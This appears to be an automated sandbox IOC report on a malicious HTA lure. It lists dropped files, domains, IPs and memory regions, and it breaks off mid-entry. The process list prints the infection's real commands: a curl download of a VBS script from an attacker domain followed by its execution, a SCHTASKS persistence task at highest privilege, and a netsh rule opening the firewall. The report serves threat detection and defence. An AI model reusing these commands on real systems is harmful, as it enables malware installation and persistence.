IOC Report
#U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta

loading gif

Files

File Path
Type
Category
Malicious
#U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta
HTML document, ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\Public\6724f91d7b54a.vbs
ASCII text, with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\6724f91d7b548[1].vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\hcx.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\_6724f91d7b3cb\7zxa.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\_6724f91d7b3cb\CSRPS.exe
PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\_6724f91d7b3cb\unrar.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\6724f91d7b351[1].js
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\d4454w[1].zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Composite Document File V2 Document, Cannot read section info
dropped
C:\_6724f91d7b3cb\CSRPS.dll
data
dropped
C:\_6724f91d7b3cb\MPDK.bat
ASCII text, with CRLF line terminators
modified
C:\_6724f91d7b3cb\downloaded.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\#U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6724f91d7b54a.vbs https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs
malicious
C:\Windows\SysWOW64\curl.exe
curl -k -o C:\Users\Public\6724f91d7b54a.vbs https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724f91d7b54a.vbs
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6724f91d7b54a.vbs"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724f91d7b54a.vbs
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\6724f91d7b54a.vbs"
malicious
C:\_6724f91d7b3cb\CSRPS.exe
"C:\_6724f91d7b3cb\CSRPS.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Query /TN "CSRPS"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "CSRPS" /TR "C:\_6724f91d7b3cb\CSRPS.exe" /SC ONLOGON /DELAY 0001:00
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="CSRPS" dir=in action=allow program="C:\_6724f91d7b3cb\CSRPS.exe" enable=yes profile=any
malicious
C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /Create /F /RL HIGHEST /TN "CSRPS" /TR "C:\_6724f91d7b3cb\CSRPS.exe" /SC ONLOGON /DELAY 0001:00
malicious
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="CSRPS" dir=in action=allow program="C:\_6724f91d7b3cb\CSRPS.exe" enable=yes profile=any
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c ipconfig /flushdns
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\_6724f91d7b3cb\CSRPS.exe
C:\_6724f91d7b3cb\CSRPS.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /flushdns
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CSRPS.exe
malicious
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 62 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://64.94.85.196/d4454w.zip
64.94.85.196
malicious
http://64.94.85.196/contador/index.php?nomepc=user-PC
64.94.85.196
malicious
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs
198.54.116.219
malicious
https://processoeconsulta.online/
unknown
malicious
http://www.ghisler.com/plugins.htm
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbs-
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbsrocessoeconsulta.online/6724f91d7b3c
unknown
http://64.94.85.196/d4454w.zipb
unknown
http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbs3
unknown
http://64.94.85.196/contador/index.php?nomepc=
unknown
https://processoeconsulta.online/6724f91d7b3cb/js/6724f91d7b351.jsB
unknown
http://www.embarcadero.com/products/delphi
unknown
http://www.scootersoftware.com/bugRepMailer.php
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbsad
unknown
http://worldtimeapi.org/api/ip-
unknown
http://64.94.85.196/d4454w.zip95EE
unknown
http://www.totalcmd.net/directory/packer.html
unknown
http://www.indyproject.org/
unknown
http://www.scootersoftware.com/buynow?bld=%dS
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsWinSta0
unknown
http://worldtimeapi.org/e~
unknown
http://worldtimeapi.org/p
unknown
http://www.scootersoftware.com/
unknown
http://www.scootersoftware.com/buynow?bld=%d
unknown
http://70.34.247.142/UPLOADMAISL.phpU
unknown
http://www.scootersoftware.com/upgradeEMP
unknown
http://www.scootersoftware.com/download.php
unknown
http://worldtimeapi.org/
unknown
https://processoeconsulta.online/6724f91d7b3cb/js/6724f91d7b351.js
198.54.116.219
http://worldtimeapi.org/api/ipb
unknown
http://worldtimeapi.org/xef
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbsU2467#U2465#U2462#U2463#U2467#U2461.
unknown
http://64.94.85.196/d4454w.zipn
unknown
http://www.scootersoftware.com/v3formats
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs~
unknown
https://processoeconsulta.online/d
unknown
http://www.scootersoftware.com/upgradeite
unknown
http://worldtimeapi.org:80/api/ip
unknown
http://worldtimeapi.org/api/ipQ
unknown
https://processoeconsulta.online/6724f91d7b3cb/js/6724f91d7b351.js(
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbscurl
unknown
http://www.scootersoftware.com. 
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsmjT
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbss
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbseC:
unknown
http://www.pngui.com/%E8%B4%AD%E4%B9%B0ordersU
unknown
http://64.94.85.196/contador/index.php?nom
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs=C:
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsu
unknown
http://worldtimeapi.org/api/ip
unknown
http://www.scootersoftware.com/upgrade
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbs
198.54.116.219
http://www.scootersoftware.com/support.php
unknown
http://worldtimeapi.org/d
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbsP
unknown
https://processoeconsulta.online/6724f91d7b3cb/js/6724f91d7b351.jsf
unknown
http://www.scootersoftware.com/download.phpS
unknown
https://processoeconsulta.online/6724f91d7b3cb/js/6724f91d7b351.jsb
unknown
http://worldtimeapi.org/xe
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbsC
unknown
https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b548.vbsZZC:
unknown
http://www.secureblackbox.com
unknown
There are 53 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
processoeconsulta.online
198.54.116.219
malicious
wnn565d215c.servegame.com
67.217.228.153
worldtimeapi.org
213.188.196.246

IPs

IP
Domain
Country
Malicious
198.54.116.219
processoeconsulta.online
United States
malicious
64.94.85.196
unknown
United States
malicious
127.0.0.1
unknown
unknown
malicious
213.188.196.246
worldtimeapi.org
Italy

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_CURRENT_USER\SOFTWARE\Scooter Software\Beyond Compare 3
CacheID

Memdumps

Base Address
Regiontype
Protect
Malicious
6304000
trusted library allocation
page read and write
93E9000
unkown
page readonly
12548000
heap
page read and write
5F0E000
heap
page read and write
BA84000
heap
page read and write
D9E0000
heap
page read and write
6251000
trusted library allocation
page read and write
2B51000
heap
page read and write
2B89000
heap
page read and write
62F7000
trusted library allocation
page read and write
CC20000
heap
page read and write
2B51000
heap
page read and write
2A83000
heap
page read and write
2974000
direct allocation
page read and write
61F5000
heap
page read and write
C738000
heap
page read and write
31E4000
heap
page read and write
9077000
unkown
page read and write
BD8C000
heap
page read and write
A1BA000
direct allocation
page read and write
E095000
heap
page read and write
CC5C000
heap
page read and write
2B51000
heap
page read and write
98D000
stack
page read and write
6247000
trusted library allocation
page read and write
90A2000
unkown
page write copy
CB5A000
heap
page read and write
32D3000
heap
page read and write
6B41000
heap
page read and write
1052000
heap
page read and write
9706000
trusted library allocation
page read and write
62FF000
trusted library allocation
page read and write
CB06000
trusted library allocation
page read and write
352F000
unkown
page read and write
32C3000
heap
page read and write
3240000
heap
page read and write
94E5000
unkown
page readonly
61B7000
heap
page read and write
2B44000
heap
page read and write
2B10000
heap
page read and write
32FC000
stack
page read and write
32AC000
heap
page read and write
48A000
unkown
page execute read
AF8000
unkown
page read and write
DFCE000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
93F2000
unkown
page readonly
2B51000
heap
page read and write
AB6000
unkown
page read and write
D62E000
heap
page read and write
2A76000
heap
page read and write
8E000
stack
page read and write
32DA000
heap
page read and write
32F0000
heap
page read and write
954B000
unkown
page readonly
AD2000
unkown
page read and write
5F0B000
heap
page read and write
E20000
heap
page read and write
2B51000
heap
page read and write
31BC000
heap
page read and write
345F000
stack
page read and write
3277000
heap
page read and write
CAE2000
trusted library allocation
page read and write
BC84000
heap
page read and write
2B51000
heap
page read and write
5210000
trusted library allocation
page read and write
3166000
heap
page read and write
612F000
stack
page read and write
3272000
heap
page read and write
9524000
unkown
page readonly
CAF9000
trusted library allocation
page read and write
5EE7000
heap
page read and write
6308000
trusted library allocation
page read and write
2FCE000
stack
page read and write
BA7F000
heap
page read and write
9506000
unkown
page readonly
693C000
heap
page read and write
6259000
trusted library allocation
page read and write
29F8000
direct allocation
page read and write
2B51000
heap
page read and write
94B2000
unkown
page readonly
2B51000
heap
page read and write
AE0A000
stack
page read and write
CA3E000
direct allocation
page read and write
3033000
heap
page read and write
2C6D000
stack
page read and write
2B44000
heap
page read and write
4F50000
heap
page read and write
6A07000
unkown
page execute read
32A0000
heap
page read and write
61F5000
heap
page read and write
3412000
heap
page read and write
2A1C000
direct allocation
page read and write
303D000
stack
page read and write
CA3E000
direct allocation
page read and write
8ADC000
unkown
page execute read
908A000
unkown
page read and write
C35A000
heap
page read and write
304C000
heap
page read and write
2AAB000
heap
page read and write
BCC6000
heap
page read and write
49C0000
heap
page read and write
5E92000
heap
page read and write
CEB4000
heap
page read and write
2A73000
heap
page read and write
A0E4000
direct allocation
page read and write
2CBF000
stack
page read and write
62F6000
trusted library allocation
page read and write
DA9B000
trusted library allocation
page read and write
320E000
unkown
page read and write
3276000
heap
page read and write
518F000
stack
page read and write
CAF9000
trusted library allocation
page read and write
CAE0000
trusted library allocation
page read and write
2F80000
heap
page read and write
2B43000
heap
page read and write
25CE000
unkown
page read and write
2FD0000
heap
page read and write
6188000
heap
page read and write
B13000
unkown
page read and write
9508000
unkown
page readonly
9D5000
heap
page read and write
31E4000
heap
page read and write
953F000
unkown
page readonly
CAF9000
trusted library allocation
page read and write
CD28000
heap
page read and write
2B51000
heap
page read and write
89A000
heap
page read and write
9499000
unkown
page readonly
61E9000
heap
page read and write
DAA4000
heap
page read and write
2B51000
heap
page read and write
28DE000
stack
page read and write
A10000
heap
page read and write
2B48000
heap
page read and write
B28000
unkown
page write copy
BE94000
heap
page read and write
381F000
stack
page read and write
AE8C000
direct allocation
page read and write
CA52000
heap
page read and write
5F07000
heap
page read and write
A520000
direct allocation
page read and write
2FE0000
heap
page read and write
89A000
heap
page read and write
371E000
stack
page read and write
ADF000
unkown
page write copy
CEF7000
heap
page read and write
BD08000
heap
page read and write
55DD000
unkown
page execute read
D18A000
heap
page read and write
5EA0000
heap
page read and write
CE30000
heap
page read and write
9410000
unkown
page readonly
2A6F000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
3166000
heap
page read and write
C528000
heap
page read and write
630B000
trusted library allocation
page read and write
5AFE000
stack
page read and write
3157000
heap
page read and write
326D000
heap
page read and write
32FE000
unkown
page read and write
3166000
heap
page read and write
B0EF000
heap
page read and write
5E91000
heap
page read and write
CD03000
heap
page read and write
6140000
heap
page read and write
5EE5000
heap
page read and write
2B60000
heap
page read and write
A2E7000
direct allocation
page read and write
31EA000
heap
page read and write
C4E7000
heap
page read and write
950A000
unkown
page readonly
2B51000
heap
page read and write
62FB000
trusted library allocation
page read and write
324C000
heap
page read and write
62FB000
trusted library allocation
page read and write
5EFC000
heap
page read and write
CC6B000
heap
page read and write
D896000
heap
page read and write
32D3000
heap
page read and write
3073000
heap
page read and write
1049000
heap
page read and write
2B51000
heap
page read and write
CC20000
heap
page read and write
5FF0000
remote allocation
page read and write
62AC000
unkown
page execute read
884000
heap
page read and write
2B51000
heap
page read and write
CAE0000
trusted library allocation
page read and write
E2E6000
heap
page read and write
3364000
heap
page read and write
36AF000
unkown
page read and write
2B51000
heap
page read and write
943F000
unkown
page readonly
6185000
heap
page read and write
9183000
unkown
page read and write
DA22000
heap
page read and write
C98C000
heap
page read and write
2C5E000
unkown
page read and write
2AA7000
heap
page read and write
2D5F000
unkown
page read and write
949B000
unkown
page readonly
2B51000
heap
page read and write
2A83000
heap
page read and write
C528000
heap
page read and write
2B51000
heap
page read and write
3286000
heap
page read and write
32E9000
heap
page read and write
780D000
unkown
page execute read
2B89000
heap
page read and write
CCDF000
heap
page read and write
2B83000
heap
page read and write
5EDB000
heap
page read and write
2B49000
heap
page read and write
61C8000
heap
page read and write
ACB000
unkown
page write copy
2B51000
heap
page read and write
CA10000
heap
page read and write
87E000
heap
page read and write
624C000
trusted library allocation
page read and write
CAF9000
trusted library allocation
page read and write
2A0E000
stack
page read and write
3290000
heap
page read and write
2F5D000
stack
page read and write
104E000
heap
page read and write
12500000
heap
page read and write
12532000
heap
page read and write
3414000
heap
page read and write
1050000
heap
page read and write
2B51000
heap
page read and write
C9A4000
direct allocation
page read and write
C9A4000
direct allocation
page read and write
88E000
heap
page read and write
105C000
heap
page read and write
D1A0000
trusted library allocation
page read and write
2B42000
heap
page read and write
36BF000
stack
page read and write
2EEE000
unkown
page read and write
9427000
unkown
page readonly
BD08000
heap
page read and write
2A83000
heap
page read and write
945B000
unkown
page readonly
55C2000
unkown
page execute and read and write
DD7D000
heap
page read and write
90C5000
unkown
page write copy
A2D8000
direct allocation
page read and write
9CE000
stack
page read and write
2960000
heap
page read and write
5FDD000
unkown
page execute read
9533000
unkown
page readonly
3350000
heap
page read and write
1073000
heap
page read and write
C630000
heap
page read and write
1040000
heap
page read and write
2BBF000
unkown
page read and write
2B51000
heap
page read and write
6A3A000
heap
page read and write
DFCE000
heap
page read and write
401000
unkown
page execute read
2A5E000
stack
page read and write
3033000
heap
page read and write
9517000
unkown
page readonly
61E9000
heap
page read and write
CB9C000
heap
page read and write
320E000
unkown
page read and write
2B51000
heap
page read and write
DBAE000
heap
page read and write
944F000
unkown
page readonly
2A94000
heap
page read and write
6248000
trusted library allocation
page read and write
12522000
heap
page read and write
CDFC000
stack
page read and write
2BCD000
stack
page read and write
CB08000
trusted library allocation
page read and write
2A23000
direct allocation
page read and write
862000
heap
page read and write
356F000
unkown
page read and write
32D3000
heap
page read and write
2810000
heap
page read and write
884000
heap
page read and write
DEC6000
heap
page read and write
9421000
unkown
page readonly
6253000
trusted library allocation
page read and write
1052000
heap
page read and write
6198000
heap
page read and write
C3DE000
heap
page read and write
288E000
stack
page read and write
32D3000
heap
page read and write
C39C000
heap
page read and write
617E000
heap
page read and write
837000
heap
page read and write
A800000
heap
page read and write
6198000
heap
page read and write
A061000
unkown
page readonly
26FD000
stack
page read and write
DF4A000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
DDBE000
heap
page read and write
2B51000
heap
page read and write
5F07000
heap
page read and write
328D000
heap
page read and write
90B7000
unkown
page write copy
2F3E000
stack
page read and write
2B51000
heap
page read and write
2EC0000
heap
page read and write
31E3000
heap
page read and write
6169000
unkown
page execute read
2845000
heap
page read and write
2D4F000
unkown
page read and write
62FB000
trusted library allocation
page read and write
508E000
stack
page read and write
624A000
trusted library allocation
page read and write
DE42000
heap
page read and write
C252000
heap
page read and write
31C0000
heap
page read and write
61CE000
heap
page read and write
AB3000
unkown
page write copy
6179000
heap
page read and write
5E7F000
stack
page read and write
E36A000
heap
page read and write
2B51000
heap
page read and write
2EFD000
stack
page read and write
326F000
heap
page read and write
CE0000
heap
page read and write
C9A0000
direct allocation
page read and write
9057000
unkown
page execute read
C528000
heap
page read and write
2B51000
heap
page read and write
2A84000
heap
page read and write
6154000
heap
page read and write
D568000
heap
page read and write
3364000
heap
page read and write
94AF000
unkown
page readonly
A2F5000
direct allocation
page read and write
3274000
heap
page read and write
E010000
heap
page read and write
3130000
heap
page read and write
CCB6000
heap
page read and write
6307000
trusted library allocation
page read and write
2FD8000
heap
page read and write
D8D8000
heap
page read and write
5EC5000
heap
page read and write
6258000
trusted library allocation
page read and write
9502000
unkown
page readonly
904B000
unkown
page execute read
9526000
unkown
page readonly
E64000
heap
page read and write
C2D6000
heap
page read and write
9544000
unkown
page readonly
B0A000
unkown
page read and write
5D7E000
stack
page read and write
2B51000
heap
page read and write
FE7000
heap
page read and write
BA42000
heap
page read and write
5F09000
heap
page read and write
AD07000
stack
page read and write
C210000
heap
page read and write
2B51000
heap
page read and write
CAFB000
trusted library allocation
page read and write
93F4000
unkown
page readonly
C14A000
heap
page read and write
2B84000
heap
page read and write
2B51000
heap
page read and write
CAD6000
heap
page read and write
2FDD000
stack
page read and write
CA3E000
direct allocation
page read and write
2B51000
heap
page read and write
32D4000
heap
page read and write
2B51000
heap
page read and write
3362000
heap
page read and write
D2D4000
heap
page read and write
296E000
unkown
page read and write
91A8000
unkown
page readonly
32D3000
heap
page read and write
305B000
heap
page read and write
914E000
unkown
page read and write
30FC000
stack
page read and write
D09C000
stack
page read and write
103E000
heap
page read and write
2920000
heap
page read and write
907C000
unkown
page write copy
28E0000
heap
page read and write
2FDE000
unkown
page read and write
CB18000
heap
page read and write
2B51000
heap
page read and write
6255000
trusted library allocation
page read and write
BE10000
heap
page read and write
B29000
unkown
page read and write
2B51000
heap
page read and write
D812000
heap
page read and write
B31000
unkown
page readonly
61B6000
heap
page read and write
2B51000
heap
page read and write
E3EF000
heap
page read and write
CAE0000
trusted library allocation
page read and write
6180000
heap
page read and write
32C6000
heap
page read and write
BB08000
heap
page read and write
A24D000
direct allocation
page read and write
5F0B000
heap
page read and write
2936000
direct allocation
page read and write
CCCF000
heap
page read and write
3266000
heap
page read and write
2ABC000
heap
page read and write
32F8000
heap
page read and write
331F000
unkown
page read and write
CE00000
remote allocation
page read and write
2FD3000
heap
page read and write
CF9F000
stack
page read and write
DA65000
heap
page read and write
104A000
heap
page read and write
2B51000
heap
page read and write
A2EE000
direct allocation
page read and write
617E000
heap
page read and write
27C0000
heap
page read and write
10AC000
heap
page read and write
BE52000
heap
page read and write
6179000
heap
page read and write
FDE000
heap
page read and write
29AD000
stack
page read and write
D670000
heap
page read and write
3500000
heap
page read and write
61A1000
heap
page read and write
2982000
direct allocation
page read and write
E15A000
heap
page read and write
2B50000
heap
page read and write
2B51000
heap
page read and write
D896000
heap
page read and write
9401000
unkown
page readonly
FED000
heap
page read and write
2733000
heap
page read and write
BC42000
heap
page read and write
BA80000
heap
page read and write
61F5000
heap
page read and write
6308000
trusted library allocation
page read and write
950F000
unkown
page readonly
DDBE000
heap
page read and write
2B1B000
heap
page read and write
D4A2000
heap
page read and write
6198000
heap
page read and write
DEC6000
heap
page read and write
DCF8000
heap
page read and write
304D000
heap
page read and write
CAE0000
trusted library allocation
page read and write
5EA1000
heap
page read and write
60E000
stack
page read and write
970A000
trusted library allocation
page read and write
2B30000
heap
page read and write
DB2A000
heap
page read and write
DAA6000
heap
page read and write
2B84000
heap
page read and write
D854000
heap
page read and write
CB0000
heap
page read and write
918E000
unkown
page read and write
4B9E000
stack
page read and write
2B44000
heap
page read and write
2B51000
heap
page read and write
2B51000
heap
page read and write
3412000
heap
page read and write
D736000
heap
page read and write
2733000
heap
page read and write
DE84000
heap
page read and write
CC36000
heap
page read and write
C4A4000
heap
page read and write
C94A000
heap
page read and write
2A15000
direct allocation
page read and write
CC45000
heap
page read and write
3003000
heap
page read and write
5D3C000
stack
page read and write
90BD000
unkown
page read and write
5F07000
heap
page read and write
18D000
stack
page read and write
333C000
heap
page read and write
E1DE000
heap
page read and write
2FD8000
heap
page read and write
3070000
heap
page read and write
2B30000
heap
page read and write
36D0000
heap
page read and write
6258000
trusted library allocation
page read and write
4F9000
stack
page read and write
43B0000
heap
page read and write
E052000
heap
page read and write
9548000
unkown
page readonly
D62E000
heap
page read and write
32D9000
heap
page read and write
2B51000
heap
page read and write
62FE000
trusted library allocation
page read and write
5F09000
heap
page read and write
6185000
heap
page read and write
2B51000
heap
page read and write
CF38000
heap
page read and write
3000000
heap
page read and write
2B51000
heap
page read and write
61A7000
heap
page read and write
3260000
heap
page read and write
630C000
trusted library allocation
page read and write
DE42000
heap
page read and write
9458000
unkown
page readonly
3273000
heap
page read and write
DC32000
heap
page read and write
A6B0000
heap
page read and write
9078000
unkown
page write copy
C14A000
heap
page read and write
6174000
heap
page read and write
5EDB000
heap
page read and write
41C000
unkown
page execute read
CDAC000
heap
page read and write
A4F5000
direct allocation
page read and write
6198000
heap
page read and write
265B000
stack
page read and write
CB06000
trusted library allocation
page read and write
33EC000
heap
page read and write
6174000
heap
page read and write
C738000
heap
page read and write
3210000
heap
page read and write
617E000
heap
page read and write
C1CE000
heap
page read and write
A16B000
direct allocation
page read and write
2A83000
heap
page read and write
3276000
heap
page read and write
2B51000
heap
page read and write
6174000
heap
page read and write
68AB000
unkown
page execute read
2726000
heap
page read and write
2A89000
heap
page read and write
D736000
heap
page read and write
D62E000
heap
page read and write
D39A000
heap
page read and write
CAF9000
trusted library allocation
page read and write
DBAE000
heap
page read and write
282C000
heap
page read and write
A162000
